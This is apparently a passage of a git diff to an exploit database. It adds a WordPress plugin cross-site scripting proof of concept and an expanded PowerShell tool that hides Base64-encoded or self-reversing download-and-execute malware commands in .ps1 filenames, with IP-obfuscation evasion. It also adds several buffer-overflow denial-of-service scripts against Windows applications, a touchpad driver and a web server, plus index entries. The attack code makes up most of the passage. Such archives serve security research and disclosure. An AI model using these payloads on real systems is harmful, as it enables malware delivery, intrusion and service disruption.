'&systemAdminPass=zerodays.LOL&systemRootPath=./&webSiteRootURL=&webSiteTitle=Zerodays.lol&databaseHost=&databaseName=&databasePass=&databasePort=&databaseUser=" \ No newline at end of file diff --git a/exploits/php/webapps/47327.txt b/exploits/php/webapps/47327.txt new file mode 100644 index 000000000..683008d6f --- /dev/null +++ b/exploits/php/webapps/47327.txt @@ -0,0 +1,17 @@ +# Exploit Title: WordPress Plugin WooCommerce Product Feed <= 2.2.18 - Cross-Site Scripting +# Date: 30 August 2019 +# Exploit Author: Damian Ebelties (https://zerodays.lol/) +# Vendor Homepage: https://wordpress.org/plugins/webappick-product-feed-for-woocommerce/ +# Version: <= 2.2.18 +# Tested on: Ubuntu 18.04.1 +# CVE: CVE-2019-1010124 + +The WordPress plugin 'WooCommerce Product Feed' does not correctly sanitize user-input, +which leads to Cross-Site Scripting in the Admin Panel. + +Since it is WordPress, it's fairly easy to get RCE with this XSS, by editing the theme +files via (for example) XHR requests with included Javascript. + +Proof-of-Concept: + + https://domain.tld/wp-admin/admin.php?page=woo_feed_manage_feed&link=%3E%3Cscript%3Ealert`zerodays.lol`;%3C/script%3E \ No newline at end of file diff --git a/exploits/windows/dos/47248.py b/exploits/windows/dos/47248.py index 8c6687d27..3ffe4e220 100755 --- a/exploits/windows/dos/47248.py +++ b/exploits/windows/dos/47248.py @@ -73,45 +73,318 @@ Note: User interaction is required, and obviously running any random PS script i ''' from base64 import b64encode -import argparse,sys -#Windows PowerShell - Unsantized Filename Command Execution Vulnerability PoC -#Create ".ps1" files with Embedded commands to download, save and execute malware within a PowerShell Script Filename. -#Expects hostname/ip-addr of web-server housing the exploit. -#By hyp3rlinx +from base64 import b64decode +from socket import * +import argparse,sys,socket,struct,re + +#GGPowerShell +#Microsoft Windows PowerShell - Unsantized Filename RCE Dirty File Creat0r. +# +#Original advisory: +#http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt +# +#Original PoC: +#https://www.youtube.com/watch?v=AH33RW9g8J4 +# +#By John Page (aka hyp3rlinx) #Apparition Security -#==================== +#========================= +#Features added to the original advisory script: +# +#Original script may have issues with -O for save files with certain PS versions, so now uses -OutFile. +# +#Added: server port option (Base64 mode only) +# +#Added: -z Reverse String Command as an alternative to default Base64 encoding obfuscation. +#Example self reversing payload to save and execute a file "n.js" from 127.0.0.1 port 80 is only 66 bytes. +# +#$a='sj.n trats;sj.n eliFtuO- 1.0.0.721 rwi'[-1..-38]-join'';iex $a +# +#-z payload requires a forced malware download on server-side, defaults port 80 and expects an ip-address. +# +#Added: IP to Integer for extra evasion - e.g 127.0.0.1 = 2130706433 +# +#Added: Prefix whitespace - attempt to hide the filename payload by push it to the end of the filename. +# +#Since we have space limit, malware names should try be 5 chars max e.g. 'a.exe' including the ext to make room for +#IP/Host/Port and whitespace especially when Base64 encoding, for reverse command string option we have more room to play. +#e.g. a.exe or n.js (1 char for the name plus 2 to 3 chars for ext plus the dot). +# +#All in the name of the dirty PS filename. +#========================================= + +BANNER=''' + ________________ _____ __ _____ __ __ + / ____/ ____/ __ \____ _ _____ _____/ ___// /_ |__ // / / / + / / __/ / __/ /_/ / __ \ | /| / / _ \/ ___/\__ \/ __ \ /_ -i flag, force-download or omit whitespace." def parse_args(): - parser.add_argument("-i", "--ipaddress", help="Remote server to download and exec malware from.") - parser.add_argument("-m", "--local_malware_name", help="Name for the Malware after downloading.") - parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.") + parser.add_argument("-s", "--server", help="Server to download malware from.") + parser.add_argument("-p", "--port", help="Malware server port, defaults 80.") + parser.add_argument("-m", "--locf", help="Name for the Malware upon download.") + parser.add_argument("-r", "--remf", nargs="?", help="Malware to download from the remote server.") + parser.add_argument("-f", "--force_download", nargs="?", const="1", help="No malware name specified, malwares force downloaded from the server web-root, malware type must be known up front.") + parser.add_argument("-z", "--rev_str_cmd", nargs="?", const="1", help="Reverse string command obfuscation Base64 alternative, ip-address and port 80 only, Malware must be force downloaded on the server-side, see -e.") + parser.add_argument("-w", "--wspace", help="Amount of whitespace to use for added obfuscation, Base64 is set for 2 bytes.") + parser.add_argument("-i", "--ipevade", nargs="?", const="1", help="Use the integer value of the malware servers IP address for obfuscation/evasion.") + parser.add_argument("-e", "--example", nargs="?", const="1", help="Show example use cases") return parser.parse_args() -def main(args): - PSEmbedFilenameMalwr="" - if args.ipaddress: - PSEmbedFilenameMalwr = "powershell iwr "+args.ipaddress+"/"+args.remote_malware_name+" -O %CD%\\"+args.local_malware_name+" ;sleep -s 2;start "+args.local_malware_name - return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE')) -def create_file(payload): - f=open("Test;PowerShell -e "+payload+";2.ps1", "w") - f.write("Write-Output 'Have a nice day!'") - f.close() +#self reverse PS commands +def rev_str_command(args): + malware=args.locf[::-1] + revload=malware + revload+=" trats;" + revload+=malware + revload+=" eliFtuO- " + revload+=args.server[::-1] + revload+=" rwi" -if __name__=="__main__": + payload = "$a='" + payload+=malware + payload+=" trats;" + payload+=malware + payload+=" eliFtuO- " + payload+=args.server[::-1] + payload+=" rwi'[-1..-"+str(len(revload)) + payload+="]-join '';iex $a" + return payload + + +def ip2int(addr): + return struct.unpack("!I", inet_aton(addr))[0] + + +def ip2hex(ip): + x = ip.split('.') + return '0x{:02X}{:02X}{:02X}{:02X}'.format(*map(int, x)) + + +def obfuscate_ip(target): + IPHex = ip2hex(target) + return str(ip2int(IPHex)) + + +def decodeB64(p): + return b64decode(p) + + +def validIP(host): + try: + socket.inet_aton(host) + return True + except socket.error: + return False - parser = argparse.ArgumentParser() - PSCmds = main(parse_args()) +def filename_sz(space,cmds,mode): + if mode==0: + return len(FILENAME_PREFIX)+len(space)+ 1 +len(POWERSHELL_OBFUSCATED)+ 4 + len(cmds)+ len(";.ps1") + else: + return len(FILENAME_PREFIX) + len(space) + 1 + len(cmds) + len(";.ps1") + + +def check_filename_size(sz): + if sz > MAX_CHARS: + print "Filename is", sz, "chars of max allowed", MAX_CHARS + print WARN_MSG + return False + return True + + +def create_file(payload, args): + try: + f=open(payload, "w") + f.write("Write-Output 'Have a good night!'") + f.close() + except Exception as e: + print "[!] File not created!" + print WARN_MSG + return False + return True + + +def cmd_info(t,p): + print "PAYLOAD: "+p + if t==0: + print "TYPE: Base64 encoded payload." + else: + print "TYPE: Self Reversing String Command (must force-download the malware server side)." + + + +def main(args): + + global FILENAME_PREFIX + if len(sys.argv)==1: parser.print_help(sys.stderr) sys.exit(1) - - create_file(PSCmds) - print "PowerShell - Unsantized Filename Command Execution File created!" - print "By hyp3rlinx" + if args.example: + usage() + exit() + + sz=0 + space="" + b64payload="" + reverse_string_cmd="" + + if not validIP(args.server): + if not args.rev_str_cmd: + if args.server.find("http://")==-1: + args.server = "http://"+args.server + + if args.ipevade: + args.server = args.server.replace("http://", "") + if validIP(args.server): + args.server = obfuscate_ip(args.server) + else: + print "[!] -i (IP evasion) requires a valid IP address, see Help -h." + exit() + + if not args.locf: + print "[!] Missing local malware save name -m flag see Help -h." + exit() + + if not args.rev_str_cmd: + + if not args.remf and not args.force_download: + print "[!] No remote malware specified, force downloading are we? use -f or -r flag, see Help -h." + exit() + + if args.remf and args.force_download: + print "[!] Multiple download options specified, use -r or -f exclusively, see Help -h." + exit() + + if args.force_download: + args.remf="" + + if args.remf: + #remote file can be extension-less + if not re.findall("^[~\w,a-zA-Z0-9]$", args.remf) and not re.findall("^[~\w,\s-]+\.[A-Za-z0-9]{2,3}$", args.remf): + print "[!] Invalid remote malware name specified, see Help -h." + exit() + + #local file extension is required + if not re.findall("^[~\w,\s-]+\.[A-Za-z0-9]{2,3}$", args.locf): + print "[!] Local malware name "+args.locf+" invalid, must contain no paths and have the correct extension." + exit() + + if not args.port: + args.port = DEFAULT_PORT + + if args.wspace: + args.wspace = int(args.wspace) + space="--IAA="*DEFAULT_BASE64_WSPACE_LEN + if args.wspace != DEFAULT_BASE64_WSPACE_LEN: + print "[!] Ignoring", args.wspace, "whitespace amount, Base64 default is two bytes" + + filename_cmd = "powershell iwr " + filename_cmd+=args.server + filename_cmd+=":" + filename_cmd+=args.port + filename_cmd+="/" + filename_cmd+=args.remf + filename_cmd+=" -OutFile " + filename_cmd+=args.locf + filename_cmd+=" ;sleep -s 2;start " + filename_cmd+=args.locf + + b64payload = b64encode(filename_cmd.encode('UTF-16LE')) + sz = filename_sz(space, b64payload, 0) + + FILENAME_PREFIX+=space + FILENAME_PREFIX+=";" + FILENAME_PREFIX+=POWERSHELL_OBFUSCATED + FILENAME_PREFIX+=" -e " + FILENAME_PREFIX+=b64payload + FILENAME_PREFIX+=";.ps1" + COMMANDS = FILENAME_PREFIX + + else: + + if args.server.find("http://")!=-1: + args.server = args.server.replace("http://","") + + if args.force_download: + print "[!] Ignored -f as forced download is already required with -z flag." + + if args.wspace: + space=" "*int(args.wspace) + + if args.remf: + print "[!] Using both -z and -r flags is disallowed, see Help -h." + exit() + + if args.port: + print "[!] -z flag must use port 80 as its default, see Help -h." + exit() + + if not re.findall("^[~\w,\s-]+\.[A-Za-z0-9]{2,3}$", args.locf): + print "[!] Local Malware name invalid -m flag." + exit() + + reverse_string_cmd = rev_str_command(args) + sz = filename_sz(space, reverse_string_cmd, 1) + + FILENAME_PREFIX+=space + FILENAME_PREFIX+=";" + FILENAME_PREFIX+=reverse_string_cmd + FILENAME_PREFIX+=";.ps1" + COMMANDS=FILENAME_PREFIX + + if check_filename_size(sz): + if create_file(COMMANDS,args): + if not args.rev_str_cmd: + cmd_info(0,decodeB64(b64payload)) + else: + cmd_info(1,reverse_string_cmd) + return sz + + return False + + +def usage(): + print "(-r) -s -p 5555 -m g.js -r n.js -i -w 2" + print " Whitespace, IP evasion, download, save and exec malware via Base64 encoded payload.\n" + print " Download an save malware simply named '2' via port 80, rename to f.exe and execute." + print " -s -m a.exe -r 2\n" + print "(-f) -s -f -m d.exe" + print " Expects force download from the servers web-root, malware type must be known upfront.\n" + print "(-z) -s 192.168.1.10 -z -m q.cpl -w 150" + print " Reverse string PowerShell command alternative to Base64 obfuscation" + print " uses self reversing string of PS commands, malware type must be known upfront." + print " Defaults port 80, ip-address only and requires server-side forced download from web-root.\n" + print "(-i) -s 192.168.1.10 -i -z -m ~.vbs -w 100" + print " Reverse string command with (-i) IP as integer value for evasion.\n" + print " Base64 is the default command obfuscation encoding, unless -z flags specified." + +if __name__=="__main__": + + print BANNER + parser = argparse.ArgumentParser() + sz = main(parse_args()) + + if sz: + print "DIRTY FILENAME SIZE: %s" % (sz) +"\n" + print "PowerShell Unsantized Filename RCE file created." ''' [POC Video URL] https://www.youtube.com/watch?v=AH33RW9g8J4 diff --git a/exploits/windows/dos/47318.py b/exploits/windows/dos/47318.py new file mode 100755 index 000000000..033ca8e82 --- /dev/null +++ b/exploits/windows/dos/47318.py @@ -0,0 +1,26 @@ +#Exploit Title: SQL Server Password Changer v1.90 Denial of Service Exploit +# Date: 29.08.2019 +# Vendor Homepage:https://www.top-password.com/ +# Exploit Author: Velayutham Selvaraj & Praveen Thiyagarayam (TwinTech Solutions) +# Tested Version: v2.10 +# Tested on: Windows 8 x64 +# Windows 7 x64 + + +# 1.- Run python code :Outlook Password Recovery.py +# 2.- Open EVIL.txt and copy content to clipboard +# 3.- Open SQL Server Password Changer and Click 'EnterKey' +# 4.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code' +# 5.- Click 'OK' and you will see a crash. + +#!/usr/bin/env python +buffer = "x41" * 6000 + +try: +f=open("Evil.txt","w") +print "[+] Creating %s bytes evil payload.." %len(buffer) +f.write(buffer) +f.close() +print "[+] File created!" +except: +print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/dos/47319.py b/exploits/windows/dos/47319.py new file mode 100755 index 000000000..e2a832d72 --- /dev/null +++ b/exploits/windows/dos/47319.py @@ -0,0 +1,71 @@ +#!/usr/bin/python + +# SWAMI KARUPASAMI THUNAI + + + +print(""" + +############################################################################ +### + +# Exploit Title: Easy MP3 Downloader Denial of Service + +# Date: 2019-08-29 + +# Exploit Author: Mohan Ravichandran & Snazzy Sanoj + +# Organization : StrongBox IT + +# Vulnerable Software: Easy MP3 Downloader + +# Version: 4.7.8.8 + +# Software Link: +https://download.cnet.com/Easy-MP3-Downloader/3000-2141_4-10860695.html + +# Tested On: Windows 10 + +# + +# Credit to Snazzy Sanoj & Meshach for discovering the Vulnerbility + +# Vulnerability Disclosure Date : 2019-08-29 + +# + +# Manual steps to reproduce the vulnerability ... + +#1. Download and install the setup file + +#2. Run this exploit code via python 2.7 + +#3. A file "exploit.txt" will be created + +#4. Copy the contents of the file + +#5. While launching the application select Enter SN + +#6. Enter random string and press Ok + +#7. Then select manual option + +#8. Then Copy the contents of the exploit.txt and paste on the Unlock Code +field + +#9. Click Ok and voila ! :P Application crashes + +############################################################################ +### + +""") + + + +file = open("exploit.txt","wb") + +junk = "A" * 6000 + +file.write(junk) + +file.close() \ No newline at end of file diff --git a/exploits/windows/dos/47322.py b/exploits/windows/dos/47322.py new file mode 100755 index 000000000..ec43bc71e --- /dev/null +++ b/exploits/windows/dos/47322.py @@ -0,0 +1,24 @@ +#!/usr/bin/python +# Exploit Title: Asus Precision TouchPad 11.0.0.25 - DoS/Privesc +# Date: 29-08-2019 +# Exploit Author: Athanasios Tserpelis of Telspace Systems +# Vendor Homepage: https://www.asus.com +# Version: 11.0.0.25 +# Software Link : https://www.asus.com +# Contact: services[@]telspace.co.za +# Twitter: @telspacesystems (Greets to the Telspace Crew) +# Tested on: Windows 10 RS5 x64 +# CVE: CVE-2019-10709 + +from ctypes import * +kernel32 = windll.kernel32 +ntdll = windll.ntdll +NULL = 0 +hevDevice = kernel32.CreateFileA("\\\\.\\AsusTP", 0xC0000000, 0, None, 0x3, 0, None) +if not hevDevice or hevDevice == -1: + print "*** Couldn't get Device Driver handle." + sys.exit(0) + +buf = "A"*12048 +raw_input("Press Enter to Trigger Vuln") +kernel32.DeviceIoControl(hevDevice, 0x221408, buf, 0x1, buf, 0x1 , 0, NULL) \ No newline at end of file diff --git a/exploits/windows/dos/47328.py b/exploits/windows/dos/47328.py new file mode 100755 index 000000000..dc64d2e8d --- /dev/null +++ b/exploits/windows/dos/47328.py @@ -0,0 +1,28 @@ +# Exploit Title: VX Search Enterprise v10.4.16 DoS +# Google Dork: N/A +# Date: 17.01.2018 +# Exploit Author: James Chamberlain [chumb0] +# Vendor Homepage: http://www.vxsearch.com/downloads.html +# Software Link: http://www.vxsearch.com/setups/vxsearchent_setup_v10.4.16.exe +# Version: v10.4.16 +# Tested on: Windows 7 Home x86 +# CVE : N/A + +# Have been unable to overwrite SEH/EIP, but the crash serves as an unauthenticated DoS. + +# Replication - Large buffer sent in the majority of Request Headers. PoC attached. Server needs http enabling (non default) + + #!/usr/bin/python +import socket + +pwnd = "A" * 5000 + +s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) +connect=s.connect(('192.168.50.133', 80)) +buf = "" +buf += "GET / HTTP/1.1" + "\r\n" +buf += "Host: 192.168.50.133\r\n" +buf += "User-Agent: " + pwnd + "r\n" +buf += "\r\n\r\n" +s.send(buf) +s.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 027651e0b..5021a92a8 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6553,6 +6553,10 @@ id,file,description,date,author,type,platform,port 47285,exploits/windows/dos/47285.py,"RAR Password Recovery 1.80 - 'User Name and Registration Code' Denial of Service",2019-08-19,Achilles,dos,windows, 47309,exploits/windows/dos/47309.py,"Outlook Password Recovery 2.10 - Denial of Service",2019-08-28,"Velayutham Selvaraj_ Praveen Thiyagarayam",dos,windows, 47316,exploits/multiple/dos/47316.txt,"Webkit JSC: JIT - Uninitialized Variable Access in ArgumentsEliminationPhase::transform",2019-08-29,"Google Security Research",dos,multiple, +47318,exploits/windows/dos/47318.py,"SQL Server Password Changer 1.90 - Denial of Service",2019-08-30,"Velayutham Selvaraj_ Praveen Thiyagarayam",dos,windows, +47319,exploits/windows/dos/47319.py,"Easy MP3 Downloader 4.7.8.8 - 'Unlock Code' Denial of Service",2019-08-30,"Mohan Ravichandran_ Snazzy Sanoj",dos,windows, +47322,exploits/windows/dos/47322.py,"Asus Precision TouchPad 11.0.0.25 - Denial of Service",2019-08-30,"Athanasios Tserpelis",dos,windows, +47328,exploits/windows/dos/47328.py,"VX Search Enterprise 10.4.16 - 'User-Agent' Denial of Service",2019-08-30,"James Chamberlain",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10665,6 +10669,7 @@ id,file,description,date,author,type,platform,port 47258,exploits/windows/local/47258.txt,"Microsoft Windows Text Services Framework MSCTF - Multiple Vulnerabilities",2019-08-15,"Google Security Research",local,windows, 47306,exploits/windows/local/47306.txt,"Windows 10 - SET_REPARSE_POINT_EX Mount Point Security Feature Bypass",2019-08-26,"Google Security Research",local,windows, 47307,exploits/linux/local/47307.rb,"Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit)",2019-08-26,Metasploit,local,linux, +47321,exploits/android/local/47321.txt,"Canon PRINT 2.5.5 - Information Disclosure",2019-08-30,0x48piraj,local,android, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -17642,6 +17647,7 @@ id,file,description,date,author,type,platform,port 47256,exploits/php/remote/47256.rb,"Agent Tesla Botnet - Arbitrary Code Execution (Metasploit)",2019-08-14,"Ege Balci",remote,php, 47298,exploits/multiple/remote/47298.rb,"LibreOffice < 6.2.6 Macro - Python Code Execution (Metasploit)",2019-08-21,LoadLow,remote,multiple, 47313,exploits/multiple/remote/47313.txt,"Cisco UCS Director_ Cisco Integrated Management Controller Supervisor and Cisco UCS Director Express for Big Data - Multiple Vulnerabilities",2019-08-21,"Pedro Ribeiro",remote,multiple, +47320,exploits/linux/remote/47320.c,"QEMU - Denial of Service",2019-08-20,vishnudevtj,remote,linux, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -41673,3 +41679,8 @@ id,file,description,date,author,type,platform,port 47312,exploits/php/webapps/47312.html,"WordPress Plugin GoURL.io < 1.4.14 - File Upload",2018-10-31,"Pouya Darabi",webapps,php, 47314,exploits/php/webapps/47314.sh,"Jobberbase 2.0 - 'subscribe' SQL Injection",2019-08-29,"Damian Ebelties",webapps,php,80 47315,exploits/php/webapps/47315.txt,"PilusCart 1.4.1 - Local File Disclosure",2019-08-29,"Damian Ebelties",webapps,php,80 +47323,exploits/php/webapps/47323.txt,"Sentrifugo 3.2 - File Upload Restriction Bypass",2019-08-30,creosote,webapps,php,80 +47324,exploits/php/webapps/47324.txt,"Sentrifugo 3.2 - Persistent Cross-Site Scripting",2019-08-30,creosote,webapps,php,80 +47325,exploits/php/webapps/47325.txt,"DomainMod 4.13 - Cross-Site Scripting",2019-08-30,"Damian Ebelties",webapps,php, +47326,exploits/php/webapps/47326.txt,"YouPHPTube 7.4 - Remote Code Execution",2019-08-30,"Damian Ebelties",webapps,php,80 +47327,exploits/php/webapps/47327.txt,"WordPress Plugin WooCommerce Product Feed 2.2.18 - Cross-Site Scripting",2019-08-30,"Damian Ebelties",webapps,php,80